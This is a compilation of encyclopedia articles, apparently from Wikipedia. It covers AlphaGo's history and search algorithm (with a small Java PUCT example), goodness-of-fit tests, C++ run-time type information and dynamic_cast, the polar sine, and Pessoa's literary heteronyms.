In October 2015, the distributed version of AlphaGo defeated the European Go champion Fan Hui,[21] a 2-dan (out of 9 dan possible) professional, five to zero.[6][22] This was the first time a computer Go program had beaten a professional human player on a full-sized board without handicap.[23] The announcement of the news was delayed until 27 January 2016 to coincide with the publication of a paper in the journal Nature[4] describing the algorithms used.[6]
AlphaGo played South Korean professional Go player Lee Sedol, ranked 9-dan, one of the best Go players,[16][needs update] in five games held at the Four Seasons Hotel in Seoul, South Korea on 9, 10, 12, 13, and 15 March 2016,[24][25] which were video-streamed live.[26] AlphaGo won four of the five games; Lee won the fourth game, which made him the only human player to beat AlphaGo in any of its 74 official games.[27] AlphaGo ran on Google's cloud computing platform, with its servers located in the United States.[28] The match used Chinese rules with a 7.5-point komi, and each side had two hours of thinking time plus three 60-second byoyomi periods.[29] The version of AlphaGo playing against Lee used a similar amount of computing power as was used in the Fan Hui match.[30] The Economist reported that it used 1,920 CPUs and 280 GPUs.[31] At the time of play, Lee Sedol had the second-highest number of Go international championship victories in the world, after South Korean player Lee Chang-ho, who had held the world championship title for 16 years.[32] Since there is no single official method of ranking in international Go, the rankings may vary among sources. While he was sometimes ranked top, some sources ranked Lee Sedol as the fourth-best player in the world at the time.[33][34] AlphaGo was not specifically trained to face Lee, nor was it designed to compete with any specific human player.
The first three games were won by AlphaGo following resignations by Lee.[35][36]However, Lee beat AlphaGo in the fourth game, winning by resignation at move 180. AlphaGo then continued to achieve a fourth win, winning the fifth game by resignation.[37]
The prize was US$1 million. Since AlphaGo won four games out of five and thus the series, the prize was donated to charities, including UNICEF.[38] Lee Sedol received $150,000 for participating in all five games and an additional $20,000 for his win in Game 4.[29]
In June 2016, at a presentation held at a university in the Netherlands, Aja Huang, a member of the DeepMind team, revealed that the team had patched the logical weakness that occurred during the fourth game of the match between AlphaGo and Lee, and that after move 78 (which was dubbed the "divine move" by many professionals), the program would play as intended and maintain Black's advantage. Before move 78, AlphaGo was leading throughout the game, but Lee's move caused the program's computing powers to be diverted and confused.[39] Huang explained that AlphaGo's policy network for finding the most accurate move order and continuation did not precisely guide AlphaGo to make the correct continuation after move 78, since its value network did not determine Lee's 78th move as being the most likely, and therefore when the move was made AlphaGo could not make the right adjustment to the logical continuation.[40]
On 29 December 2016, a new account on the Tygem server named "Magister" (shown as 'Magist' on the server's Chinese version) from South Korea began to play games with professional players. It changed its account name to "Master" on 30 December, then moved to the FoxGo server on 1 January 2017. On 4 January, DeepMind confirmed that the "Magister" and the "Master" accounts were both played by an updated version of AlphaGo, called AlphaGo Master.[41][42] As of 5 January 2017, AlphaGo Master's online record was 60 wins and 0 losses,[43] including three victories over Go's top-ranked player, Ke Jie,[44] who had been quietly briefed in advance that Master was a version of AlphaGo.[43] After losing to Master, Gu Li offered a bounty of 100,000 yuan (US$14,400) to the first human player who could defeat Master.[42] Master played at the pace of 10 games per day. Many quickly suspected it to be an AI player due to little or no resting between games. Its adversaries included many world champions such as Ke Jie, Park Jeong-hwan, Yuta Iyama, Tuo Jiaxi, Mi Yuting, Shi Yue, Chen Yaoye, Li Qincheng, Gu Li, Chang Hao, Tang Weixing, Fan Tingyu, Zhou Ruiyang, Jiang Weijie, Chou Chun-hsun, Kim Ji-seok, Kang Dong-yun, Park Yeong-hun, and Won Seong-jin, as well as national champions or world championship runners-up such as Lian Xiao, Tan Xiao, Meng Tailing, Dang Yifei, Huang Yunsong, Yang Dingxin, Gu Zihao, Shin Jinseo, Cho Han-seung, and An Sungjoon. All 60 games except one were fast-paced games with three 20- or 30-second byo-yomi periods. Master offered to extend the byo-yomi to one minute when playing with Nie Weiping in consideration of his age. After winning its 59th game, Master revealed itself in the chatroom to be controlled by Dr. Aja Huang of the DeepMind team,[45] then changed its nationality to the United Kingdom. After these games were completed, the co-founder of DeepMind, Demis Hassabis, said in a tweet, "we're looking forward to playing some official, full-length games later [2017] in collaboration with Go organizations and experts".[41][42]
Go experts were impressed by the program's performance and its nonhuman play style; Ke Jie stated that "After humanity spent thousands of years improving our tactics, computers tell us that humans are completely wrong... I would go as far as to say not a single human has touched the edge of the truth of Go."[43]
At the Future of Go Summit held in Wuzhen in May 2017, AlphaGo Master played three games with Ke Jie, the world No. 1 ranked player, as well as two games with several top Chinese professionals: one pair-Go game and one against a collaborating team of five human players.[46]
Google DeepMind offered a 1.5 million dollar prize to the winner of the three-game match between Ke Jie and Master, while the losing side took 300,000 dollars.[47][48] Master won all three games against Ke Jie,[49][50] after which AlphaGo was awarded professional 9-dan by the Chinese Weiqi Association.[11]
After winning its three-game match against Ke Jie, the top-rated world Go player, AlphaGo retired. DeepMind also disbanded the team that worked on the game to focus on AI research in other areas.[12] After the Summit, DeepMind published 50 full-length AlphaGo vs. AlphaGo matches as a gift to the Go community.[51]
AlphaGo's team published an article in the journal Nature on 19 October 2017, introducing AlphaGo Zero, a version without human data and stronger than any previous human-champion-defeating version.[52] By playing games against itself, AlphaGo Zero surpassed the strength of AlphaGo Lee in three days by winning 100 games to 0, reached the level of AlphaGo Master in 21 days, and exceeded all the old versions in 40 days.[53]
In a paper released on arXiv on 5 December 2017, DeepMind claimed that it had generalized AlphaGo Zero's approach into a single AlphaZero algorithm, which achieved within 24 hours a superhuman level of play in the games of chess, shogi, and Go by defeating the world-champion programs Stockfish and Elmo and a three-day version of AlphaGo Zero, respectively.[54]
On 11 December 2017, DeepMind released an AlphaGo teaching tool on its website[55] to analyze winning rates of different Go openings as calculated by AlphaGo Master.[56] The teaching tool collects 6,000 Go openings from 230,000 human games, each analyzed with 10,000,000 simulations by AlphaGo Master. Many of the openings include human move suggestions.[56]
An early version of AlphaGo was tested on hardware with various numbers of CPUs and GPUs, running in asynchronous or distributed mode. Two seconds of thinking time was given to each move. The resulting Elo ratings are listed below.[4] Higher ratings were achieved in the matches with more time per move.
In May 2016, Google unveiled its own proprietary hardware "tensor processing units", which it stated had already been deployed in multiple internal projects at Google, including the AlphaGo match against Lee Sedol.[57][58]
At the Future of Go Summit in May 2017, DeepMind disclosed that the version of AlphaGo used in the Summit was AlphaGo Master,[59][60] and revealed that it had measured the strength of different versions of the software. AlphaGo Lee, the version used against Lee, could give AlphaGo Fan, the version used in AlphaGo vs. Fan Hui, three stones, and AlphaGo Master was even three stones stronger.[61]
As of 2016, AlphaGo's algorithm uses a combination of machine learning and tree search techniques, combined with extensive training, both from human and computer play. It uses Monte Carlo tree search, guided by a "value network" and a "policy network", both implemented using deep neural network technology.[5][4] A limited amount of game-specific feature-detection pre-processing (for example, to highlight whether a move matches a nakade pattern) is applied to the input before it is sent to the neural networks.[4] The networks are convolutional neural networks with 12 layers, trained by reinforcement learning.[4]
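The interplay of the two networks with the tree search can be illustrated with the PUCT-style selection rule used in AlphaGo-like search, which picks the child maximising Q(s,a) + c·P(s,a)·√N(s)/(1 + N(s,a)). The toy sketch below is an assumption-laden miniature, not DeepMind's implementation: fixed priors stand in for the policy network's output, fixed evaluations for the value network's, and all numbers and names are hypothetical.

```java
import java.util.Arrays;

public class PuctDemo {
    // One tree node: per-child visit counts N(s,a), summed values W(s,a),
    // and policy priors P(s,a).
    static class Node {
        double[] prior;
        int[] visits;
        double[] value;
        Node(double[] prior) {
            this.prior = prior;
            this.visits = new int[prior.length];
            this.value = new double[prior.length];
        }
        // PUCT: argmax_a Q(s,a) + c * P(s,a) * sqrt(sum_b N(s,b)) / (1 + N(s,a))
        int select(double c) {
            int total = Arrays.stream(visits).sum();
            int best = 0;
            double bestScore = Double.NEGATIVE_INFINITY;
            for (int a = 0; a < prior.length; a++) {
                double q = visits[a] == 0 ? 0.0 : value[a] / visits[a];
                double u = c * prior[a] * Math.sqrt(total) / (1 + visits[a]);
                if (q + u > bestScore) { bestScore = q + u; best = a; }
            }
            return best;
        }
        // Back up one simulated evaluation for action a.
        void update(int a, double v) { visits[a]++; value[a] += v; }
    }

    public static void main(String[] args) {
        // Hypothetical 3-move position: the priors favour move 0, but the
        // evaluations (standing in for the value network) favour move 2.
        Node root = new Node(new double[]{0.6, 0.3, 0.1});
        double[] eval = {0.2, 0.3, 0.9};
        for (int i = 0; i < 1000; i++) {
            int a = root.select(1.5);
            root.update(a, eval[a]);
        }
        System.out.println(Arrays.toString(root.visits)); // move 2 gets the most visits
    }
}
```

The sketch shows the key dynamic: priors steer early exploration, but as visit counts grow, the value estimates dominate and the search concentrates on the strongest move.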
The system's neural networks were initially bootstrapped from human gameplay expertise. AlphaGo was initially trained to mimic human play by attempting to match the moves of expert players from recorded historical games, using a database of around 30 million moves.[21] Once it had reached a certain degree of proficiency, it was trained further by being set to play large numbers of games against other instances of itself, using reinforcement learning to improve its play.[5] To avoid "disrespectfully" wasting its opponent's time, the program is specifically programmed to resign if its assessment of win probability falls beneath a certain threshold; for the match against Lee, the resignation threshold was set to 20%.[64]
Toby Manning, the match referee for AlphaGo vs. Fan Hui, has described the program's style as "conservative".[65] AlphaGo's playing style strongly favours a greater probability of winning by fewer points over a lesser probability of winning by more points.[19] Its strategy of maximising its probability of winning is distinct from what human players tend to do, which is to maximise territorial gains, and explains some of its odd-looking moves.[66] It makes many opening moves that have never or seldom been made by humans. It likes to use shoulder hits, especially if the opponent is overconcentrated.[67]
AlphaGo's March 2016 victory was a major milestone in artificial intelligence research.[68]Go had previously been regarded as a hard problem in machine learning that was expected to be out of reach for the technology of the time.[68][69][70]Most experts thought a Go program as powerful as AlphaGo was at least five years away;[71]some experts thought that it would take at least another decade before computers would beat Go champions.[4][72][73]Most observers at the beginning of the 2016 matches expected Lee to beat AlphaGo.[68]
With games such as checkers (which has been solved by the Chinook computer engine), chess, and now Go won by computers, victories at popular board games can no longer serve as major milestones for artificial intelligence in the way that they used to. Deep Blue's Murray Campbell called AlphaGo's victory "the end of an era... board games are more or less done and it's time to move on."[68]
When compared with Deep Blue or Watson, AlphaGo's underlying algorithms are potentially more general-purpose and may be evidence that the scientific community is making progress towards artificial general intelligence.[19][74] Some commentators believe AlphaGo's victory makes for a good opportunity for society to start preparing for the possible future impact of machines with general-purpose intelligence. As noted by entrepreneur Guy Suter, AlphaGo only knows how to play Go and doesn't possess general-purpose intelligence; "[It] couldn't just wake up one morning and decide it wants to learn how to use firearms."[68] AI researcher Stuart Russell said that AI systems such as AlphaGo have progressed quicker and become more powerful than expected, and we must therefore develop methods to ensure they "remain under human control".[75] Some scholars, such as Stephen Hawking, warned (in May 2015, before the matches) that some future self-improving AI could gain actual general intelligence, leading to an unexpected AI takeover; other scholars disagree: AI expert Jean-Gabriel Ganascia believes that "Things like 'common sense'... may never be reproducible",[76] and says "I don't see why we would speak about fears. On the contrary, this raises hopes in many domains such as health and space exploration."[75] Computer scientist Richard Sutton said "I don't think people should be scared... but I do think people should be paying attention."[77]
In China, AlphaGo was a "Sputnik moment" which helped convince the Chinese government to prioritize and dramatically increase funding for artificial intelligence.[78]
In 2017, the DeepMind AlphaGo team received the inaugural IJCAI Marvin Minsky Medal for Outstanding Achievements in AI. "AlphaGo is a wonderful achievement, and a perfect example of what the Minsky Medal was initiated to recognise", said Professor Michael Wooldridge, Chair of the IJCAI Awards Committee. "What particularly impressed IJCAI was that AlphaGo achieves what it does through a brilliant combination of classic AI techniques as well as the state-of-the-art machine learning techniques that DeepMind is so closely associated with. It's a breathtaking demonstration of contemporary AI, and we are delighted to be able to recognise it with this award."[79]
Go is a popular game in China, Japan and Korea, and the 2016 matches were watched by perhaps a hundred million people worldwide.[68][80] Many top Go players characterized AlphaGo's unorthodox plays as seemingly-questionable moves that initially befuddled onlookers, but made sense in hindsight:[72] "All but the very best Go players craft their style by imitating top players. AlphaGo seems to have totally original moves it creates itself."[68] AlphaGo appeared to have unexpectedly become much stronger, even when compared with its October 2015 match,[81] where a computer had beaten a Go professional for the first time ever without the advantage of a handicap.[82] The day after Lee's first defeat, Jeong Ahram, the lead Go correspondent for one of South Korea's biggest daily newspapers, said "Last night was very gloomy... Many people drank alcohol."[83] The Korea Baduk Association, the organization that oversees Go professionals in South Korea, awarded AlphaGo an honorary 9-dan title for exhibiting creative skills and pushing forward the game's progress.[84]
China's Ke Jie, an 18-year-old generally recognized as the world's best Go player at the time,[33][85] initially claimed that he would be able to beat AlphaGo, but declined to play against it for fear that it would "copy my style".[85] As the matches progressed, Ke Jie went back and forth, stating that "it is highly likely that I (could) lose" after analysing the first three matches,[86] but regaining confidence after AlphaGo displayed flaws in the fourth match.[87]
Toby Manning, the referee of AlphaGo's match against Fan Hui, and Hajin Lee, secretary general of the International Go Federation, both reason that in the future, Go players will get help from computers to learn what they have done wrong in games and improve their skills.[82]
After game two, Lee said he felt "speechless": "From the very beginning of the match, I could never manage an upper hand for one single move. It was AlphaGo's total victory."[88]Lee apologized for his losses, stating after game three that "I misjudged the capabilities of AlphaGo and felt powerless."[68]He emphasized that the defeat was "Lee Se-dol's defeat" and "not a defeat of mankind".[27][76]Lee said his eventual loss to a machine was "inevitable" but stated that "robots will never understand the beauty of the game the same way that we humans do."[76]Lee called his game four victory a "priceless win that I (would) not exchange for anything."[27]
On Rotten Tomatoes, the documentary holds an approval rating of 100% based on 10 reviews.[89]
Michael Rechtshaffen of the Los Angeles Times gave the documentary a positive review, saying: "It helps matters when you have a group of engaging human subjects like soft-spoken Sedol, who's as intensively contemplative as the game itself, contrasted by the spirited, personable Fan Hui, the Paris-based European champ who accepts an offer to serve as an advisor for the DeepMind team after suffering a demoralizing AI trouncing". He also noted that, with the contribution of Volker Bertelmann (Hauschka), the film's producer, the documentary shows many unexpected sequences, including strategic and philosophical components.[90]
John Defore of The Hollywood Reporter wrote that the documentary is "an involving sports-rivalry doc with an AI twist": "In the end, observers wonder if AlphaGo's odd variety of intuition might not kill Go as an intellectual pursuit but shift its course, forcing the game's scholars to consider it from new angles. So maybe it isn't time to welcome our computer overlords, and won't be for a while - maybe they'll teach us to be better thinkers before turning us into their slaves."[91]
Greg Kohs, the director of the film, said "The complexity of the game of Go, combined with the technical depth of an emerging technology like artificial intelligence seemed like it might create an insurmountable barrier for a film like this. The fact that I was so innocently unaware of Go and AlphaGo actually proved to be beneficial. It allowed me to approach the action and interviews with pure curiosity, the kind that helps make any subject matter emotionally accessible." Kohs also said that "Unlike the film's human characters – who turn their curious quest for knowledge into an epic spectacle with great existential implications, who dare to risk their reputation and pride to contest that curiosity – AI might not yet possess the ability to empathize. But it can teach us profound things about our humanness – the way we play board games, the way we think and feel and grow. It's a deep, vast premise, but my hope is, by sharing it, we can discover something within ourselves we never saw before".[92]
Hajin Lee, a former professional Go player, described the documentary as "beautifully filmed". Beyond the story itself, the feelings and atmosphere are conveyed through the scene arrangements: the close-up shots of Lee Sedol when he realizes how intelligent the AlphaGo AI is, the atmospheric scene of the Korean commentator's distress and affliction following the first defeat, and the tension being held inside the room. The documentary also tells its story by describing the background of the AlphaGo technology and the customs of the Korean Go community. She suggested some areas that could have been covered additionally: "If anything could be added, I would include information about the primitive level of top Go A.I.s before AlphaGo, and more about professional Go players' lives and pride, to provide more context for Lee Sedol's pre-match confidence, and Go players' changing perception of AlphaGo as the match advanced".[93]
Fan Hui, a professional Go player who played against AlphaGo, said that "DeepMind had trained AlphaGo by showing it many strong amateur games of Go to develop its understanding of how a human plays before challenging it to play versions of itself thousands of times, a novel form of reinforcement learning which had given it the ability to rival an expert human. History had been made, and centuries of received learning overturned in the process. The program was free to learn the game for itself."[94]
James Vincent, a reporter for The Verge, commented: "It prods and pokes viewers with unsubtle emotional cues, like a reality TV show would. 'Now, you should be nervous; now you should feel relieved.'" The AlphaGo footage slowly captures the moment when Lee Sedol acknowledges the true power of the AlphaGo AI. Going into the first game he was confident it would be easy to beat the AI, but the early game dynamics were not what he expected. After losing the first match, he became more nervous and lost confidence. Afterward, he reacted to attacks by saying that he just wanted to win the match, unintentionally displaying his anger and acting in an unusual way. He also spent 12 minutes on one move, while AlphaGo took only a minute and a half to respond. AlphaGo weighed each alternative equally and consistently, with no reaction to Lee's fighting; instead, the game continued as if he were not there.
Vincent also wrote: "suffice to say that humanity does land at least one blow on the machines, through Lee's so-called 'divine move'. ... More likely, the forces of automation we'll face will be impersonal and incomprehensible. They'll come in the form of star ratings we can't object to, and algorithms we can't fully understand. Dealing with the problems of AI will take a perspective that looks beyond individual battles. AlphaGo is worth seeing because it raises these questions."[95]
Murray Shanahan, professor of cognitive robotics at Imperial College London and senior research scientist at DeepMind, commented: "Go is an extraordinary game but it represents what we can do with AI in all kinds of other spheres. In just the same way there are all kinds of realms of possibility within Go that have not been discovered, we could never have imagined the potential for discovering drugs and other materials."[94]
Facebook has also been working on its own Go-playing system, darkforest, also based on combining machine learning and Monte Carlo tree search.[65][96] Although a strong player against other computer Go programs, as of early 2016 it had not yet defeated a professional human player.[97] Darkforest has lost to CrazyStone and Zen and is estimated to be of similar strength to both.[98]
DeepZenGo, a system developed with support from video-sharing website Dwango and the University of Tokyo, lost 2–1 in November 2016 to Go master Cho Chikun, who holds the record for the largest number of Go title wins in Japan.[99][100]
A 2018 paper in Nature cited AlphaGo's approach as the basis for a new means of computing potential pharmaceutical drug molecules.[101][102] Systems consisting of Monte Carlo tree search guided by neural networks have since been explored for a wide array of applications.[103]
AlphaGo Master (white) v. Tang Weixing (31 December 2016); AlphaGo won by resignation. White 36 was widely praised.
The documentary film AlphaGo[9][89] raised hopes that Lee Sedol and Fan Hui would have benefited from their experience of playing AlphaGo, but as of May 2018 their ratings were little changed; Lee Sedol was ranked 11th in the world, and Fan Hui 545th.[104] On 19 November 2019, Lee announced his retirement from professional play, arguing that he could never be the top overall player of Go due to the increasing dominance of AI, which he called "an entity that cannot be defeated".[105]
https://en.wikipedia.org/wiki/AlphaGo
The goodness of fit of a statistical model describes how well it fits a set of observations. Measures of goodness of fit typically summarize the discrepancy between observed values and the values expected under the model in question. Such measures can be used in statistical hypothesis testing, e.g. to test for normality of residuals, to test whether two samples are drawn from identical distributions (see Kolmogorov–Smirnov test), or whether outcome frequencies follow a specified distribution (see Pearson's chi-square test). In the analysis of variance, one of the components into which the variance is partitioned may be a lack-of-fit sum of squares.
In assessing whether a given distribution is suited to a data set, the following tests and their underlying measures of fit can be used:
In regression analysis, more specifically regression validation, the following topics relate to goodness of fit:
The following are examples that arise in the context of categorical data.
Pearson's chi-square test uses a measure of goodness of fit which is the sum of differences between observed and expected outcome frequencies (that is, counts of observations), each squared and divided by the expectation:
χ² = ∑_{i=1}^{n} (O_i − E_i)² / E_i,
where O_i is the observed count and E_i the expected count for bin i.
The expected frequency is calculated by E_i = (F(Y_u) − F(Y_l)) N, where F is the cumulative distribution function for the probability distribution being tested, Y_u is the upper limit for class i, Y_l is the lower limit for class i, and N is the sample size.
The resulting value can be compared with a chi-square distribution to determine the goodness of fit. The chi-square distribution has (k − c) degrees of freedom, where k is the number of non-empty bins and c is the number of estimated parameters (including location, scale, and shape parameters) for the distribution plus one. For example, for a 3-parameter Weibull distribution, c = 4.
A binomial experiment is a sequence of independent trials in which the trials can result in one of two outcomes, success or failure. There are n trials, each with probability of success denoted by p. Provided that np_i ≫ 1 for every i (where i = 1, 2, ..., k), then
χ2=∑i=1k(Ni−npi)2npi=∑allbins(O−E)2E.{\displaystyle \chi ^{2}=\sum _{i=1}^{k}{\frac {(N_{i}-np_{i})^{2}}{np_{i}}}=\sum _{\mathrm {all\ bins} }^{}{\frac {(\mathrm {O} -\mathrm {E} )^{2}}{\mathrm {E} }}.}
This has approximately a chi-square distribution with k − 1 degrees of freedom. The fact that there are k − 1 degrees of freedom is a consequence of the restriction ∑N_i = n. We know there are k observed bin counts; however, once any k − 1 are known, the remaining one is uniquely determined. Basically, one can say there are only k − 1 freely determined bin counts, thus k − 1 degrees of freedom.
G-tests are likelihood-ratio tests of statistical significance that are increasingly being used in situations where Pearson's chi-square tests were previously recommended.[7]
The general formula for G is
G = 2 ∑_i O_i ln(O_i / E_i),
where O_i and E_i are the same as for the chi-square test, ln denotes the natural logarithm, and the sum is taken over all non-empty bins. Furthermore, the total observed count should be equal to the total expected count: ∑_i O_i = ∑_i E_i = N, where N is the total number of observations.
G-tests have been recommended at least since the 1981 edition of the popular statistics textbook by Robert R. Sokal and F. James Rohlf.[8]
https://en.wikipedia.org/wiki/Goodness_of_fit
In computer programming, run-time type information or run-time type identification (RTTI)[1] is a feature of some programming languages (such as C++,[2] Object Pascal, and Ada[3]) that exposes information about an object's data type at runtime. Run-time type information may be available for all types or only for types that explicitly have it (as is the case with Ada). Run-time type information is a specialization of a more general concept called type introspection.
In the original C++ design, Bjarne Stroustrup did not include run-time type information, because he thought this mechanism was often misused.[4]
In C++, RTTI can be used to do safe typecasts using the dynamic_cast<> operator, and to manipulate type information at runtime using the typeid operator and std::type_info class. In Object Pascal, RTTI can be used to perform safe type casts with the as operator, test the class to which an object belongs with the is operator, and manipulate type information at run time with classes contained in the RTTI unit[5] (i.e. the classes TRttiContext, TRttiInstanceType, etc.). In Ada, objects of tagged types also store a type tag, which permits the identification of the type of these objects at runtime. The in operator can be used to test, at runtime, whether an object is of a specific type and may be safely converted to it.[6]
RTTI is available only for classes that are polymorphic, which means they have at least one virtual method. In practice, this is not a limitation, because base classes must have a virtual destructor to allow objects of derived classes to perform proper cleanup if they are deleted from a base pointer.
Some compilers have flags to disable RTTI. Using these flags may reduce the overall size of the application, making them especially useful when targeting systems with a limited amount of memory.[7]
The typeid reserved word (keyword) is used to determine the class of an object at runtime. It returns a reference to a std::type_info object, which exists until the end of the program.[8] The use of typeid, in a non-polymorphic context, is often preferred over dynamic_cast<class_type> in situations where just the class information is needed, because typeid is always a constant-time procedure, whereas dynamic_cast may need to traverse the class derivation lattice of its argument at runtime.[citation needed] Some aspects of the returned object are implementation-defined, such as std::type_info::name(), and cannot be relied on to be consistent across compilers.
Objects of class std::bad_typeid are thrown when the expression for typeid is the result of applying the unary * operator to a null pointer. Whether an exception is thrown for other null reference arguments is implementation-dependent. In other words, for the exception to be guaranteed, the expression must take the form typeid(*p) where p is any expression resulting in a null pointer.
The name returned by std::type_info::name() is implementation-defined, so the exact output of such code varies by system and compiler.
The dynamic_cast operator in C++ is used for downcasting a reference or pointer to a more specific type in the class hierarchy. Unlike static_cast, the target of dynamic_cast must be a pointer or reference to a class. Unlike static_cast and the C-style typecast (where the type check occurs at compile time), a type safety check is performed at runtime. If the types are not compatible, an exception will be thrown (when dealing with references) or a null pointer will be returned (when dealing with pointers).
A Java typecast behaves similarly; if the object being cast is not actually an instance of the target type, and cannot be converted to one by a language-defined method, an instance of java.lang.ClassCastException will be thrown.[9]
Suppose some function takes an object of type A as its argument, and wishes to perform some additional operation if the object passed is an instance of B, a subclass of A. This can be done using dynamic_cast as follows.
A similar version of MyFunction can be written with pointers instead of references; in that case, dynamic_cast returns a null pointer on failure rather than throwing an exception.
In Object Pascal and Delphi, the operator is is used to check the type of a class at runtime. It tests whether an object belongs to a given class, including the individual ancestor classes present in the inheritance hierarchy tree (e.g. Button1 is a TButton class with ancestors TWinControl → TControl → TComponent → TPersistent → TObject, the last being the ancestor of all classes). The operator as is used when an object needs to be treated at run time as if it belonged to an ancestor class.
The RTTI unit is used to manipulate object type information at run time. It contains a set of classes that allow you to get information about an object's class and its ancestors, properties, methods and events, to change property values, and to call methods: for example, obtaining information about the class to which an object belongs, creating an instance of it, and calling its methods.
https://en.wikipedia.org/wiki/Dynamic_cast
In geometry, the polar sine generalizes the sine function of angle to the vertex angle of a polytope. It is denoted by psin.
Let v1, ..., vn (n ≥ 1) be non-zero Euclidean vectors in n-dimensional space (Rn) that are directed from a vertex of a parallelotope, forming the edges of the parallelotope. The polar sine of the vertex angle is
psin(v1, ..., vn) = Ω / Π,
where the numerator is the determinant
Ω = det[v1 v2 ⋯ vn],
which equals the signed hypervolume of the parallelotope with vector edges v1, ..., vn,[1]
and where the denominator is the n-fold product
Π = ∏_{i=1}^{n} ‖vi‖
of the magnitudes of the vectors, which equals the hypervolume of the n-dimensional hyperrectangle with edges equal to the magnitudes of the vectors ‖v1‖, ‖v2‖, ..., ‖vn‖ rather than the vectors themselves. Also see Ericksson.[2]
The parallelotope is like a "squashed hyperrectangle", so it has less hypervolume than the hyperrectangle, meaning (see image for the 3d case)
−1 ≤ psin(v1, ..., vn) ≤ 1,
as for the ordinary sine, with either bound being reached only in the case that all vectors are mutually orthogonal.
In the case n = 2, the polar sine is the ordinary sine of the angle between the two vectors.
A non-negative version of the polar sine that works in any m-dimensional space can be defined using the Gram determinant. It is a ratio where the denominator is as described above. The numerator is
Ω = √(det(MᵀM)),
where M is the m × n matrix whose columns are the vectors vi and the superscript T indicates matrix transposition. This can be nonzero only if m ≥ n. In the case m = n, this is equivalent to the absolute value of the definition given previously. In the degenerate case m < n, the determinant will be of a singular n × n matrix, giving Ω = 0 and psin = 0, because it is not possible to have n linearly independent vectors in m-dimensional space when m < n.
The polar sine changes sign whenever two vectors are interchanged, due to the antisymmetry of row-exchanging in the determinant; however, its absolute value will remain unchanged.
The polar sine does not change if all of the vectors v1, ..., vn are scalar-multiplied by positive constants ci, due to the factorization
psin(c1v1, ..., cnvn) = (∏_{i=1}^{n} ci / ∏_{i=1}^{n} |ci|) psin(v1, ..., vn).
If an odd number of these constants are instead negative, then the sign of the polar sine will change; however, its absolute value will remain unchanged.
If the vectors are not linearly independent, the polar sine will be zero. This will always be so in the degenerate case that the number of dimensions m is strictly less than the number of vectors n.
The cosine of the angle between two non-zero vectors is given by
cos γij = (vi ⋅ vj) / (‖vi‖ ‖vj‖),
using the dot product. Comparison of this expression to the definition of the absolute value of the polar sine as given above gives
psin²(v1, ..., vn) = det(C), where C is the n × n matrix with entries Cij = cos γij (and Cii = 1).
In particular, for n = 2, this is equivalent to
sin² γ = 1 − cos² γ,
which is the Pythagorean trigonometric identity.
Polar sines were investigated by Euler in the 18th century.[3]
https://en.wikipedia.org/wiki/Polar_sine
The literary concept of the heteronym refers to one or more imaginary characters created by a writer to write in different styles. Heteronyms differ from pen names (or pseudonyms, from the Greek words for "false" and "name") in that the latter are just false names, while the former are characters that have their own supposed physiques, biographies, and writing styles.[1]
Heteronyms were named and developed by the Portuguese writer and poet Fernando Pessoa in the early 20th century, but they were thoroughly explored by the Danish philosopher Kierkegaard in the 19th century and have also been used by other writers.
In Pessoa's case, there are at least 70 heteronyms (according to the latest count by Pessoa's editor Teresa Rita Lopes). Some of them are relatives or know each other; they criticise and translate each other's works. Pessoa's three chief heteronyms are Alberto Caeiro, Ricardo Reis and Álvaro de Campos; the latter two consider the former their master. There are also two whom Pessoa called semi-heteronyms, Bernardo Soares and the Baron of Teive, who are semi-autobiographical characters who write in prose, "a mere mutilation" of the Pessoa personality. There is, lastly, an orthonym, Fernando Pessoa, the namesake of the author, who also considers Caeiro his master.
The heteronyms dialogue with each other and even with Pessoa in what he calls "the theatre of being" or "drama in people". They sometimes intervened in Pessoa's social life: during Pessoa's only attested romance, a jealous Campos wrote letters to the girl, who enjoyed the game and wrote back.
Pessoa, also an amateur astrologer, created in 1915 the heteronym Raphael Baldaya, a long-bearded astrologer. He drew up horoscopes of his main heteronyms in order to determine their personalities.
Fernando Pessoa on the heteronyms
How do I write in the name of these three? Caeiro, through sheer and unexpected inspiration, without knowing or even suspecting that I'm going to write in his name. Ricardo Reis, after an abstract meditation, which suddenly takes concrete shape in an ode. Campos, when I feel a sudden impulse to write and don't know what. (My semi-heteronym Bernardo Soares, who in many ways resembles Álvaro de Campos, always appears when I'm sleepy or drowsy, so that my qualities of inhibition and rational thought are suspended; his prose is an endless reverie. He's a semi-heteronym because his personality, although not my own, doesn't differ from my own but is a mere mutilation of it. He's me without my rationalism and emotions. His prose is the same as mine, except for certain formal restraint that reason imposes on my own writing, and his Portuguese is exactly the same – whereas Caeiro writes bad Portuguese, Campos writes it reasonably well but with mistakes such as "me myself" instead of "I myself", etc.., and Reis writes better than I, but with a purism I find excessive...)
George Steiner on the heteronyms
Pseudonymous writing is not rare in literature or philosophy (Kierkegaard provides a celebrated instance). 'Heteronyms', as Pessoa called and defined them, are something different and exceedingly strange. For each of his 'voices', Pessoa conceived a highly distinctive poetic idiom and technique, a complex biography, a context of literary influence and polemics and, most arrestingly of all, subtle interrelations and reciprocities of awareness. Octavio Paz defines Caeiro as 'everything that Pessoa is not and more'.
He is a man magnificently at home in nature, a virtuoso of pre-Christian innocence, almost a Portuguese teacher of Zen. Reis is a stoic Horatian, a pagan believer in fate, a player with classical myths less original than Caeiro, but more representative of modern symbolism. De Campos emerges as a Whitmanesque futurist, a dreamer in drunkenness, the Dionysian singer of what is oceanic and windswept in Lisbon. None of this triad resembles the metaphysical solitude, the sense of being an occultist medium which characterise Pessoa's 'own' intimate verse.
Richard Zenith on the heteronyms
Álvaro de Campos was the poet-persona who grew old with Pessoa and held a privileged place in his inventor's heart. Soares, the assistant bookkeeper, and Campos, the naval engineer, never met in the pen-and-paper drama of Pessoa's heteronyms, who were frequently pitted against one another, but the two writer-characters were spiritual brothers, even if their worldly occupations were at odds. Campos wrote prose as well as poetry, and much of it reads as if it came, so to speak, from the hand of Soares. Pessoa was often unsure who was writing when he wrote, and it is curious that the very first item among the more than 25,000 pieces that make up his archives in the National Library of Lisbon bears the heading A. de C. (?) or B. de D. (or something else).
This heteronym was created by Fernando Pessoa as an alter ego who inherited his role from Alexander Search, who in turn had inherited it from Charles Robert Anon. The latter was created when Pessoa lived in Durban, while Search was created in 1906, when Pessoa was a student at the University of Lisbon, in search of his Portuguese cultural identity after his return from Durban.
Anon was supposedly English, while Search, although English, was born in Lisbon. After the Portuguese republican revolution in 1910, and the consequent patriotic atmosphere, Pessoa dropped his English heteronyms, and Álvaro de Campos was created as a Portuguese alter ego. Álvaro de Campos, born in 1890, was supposedly a Portuguese naval engineer who graduated in Glasgow.
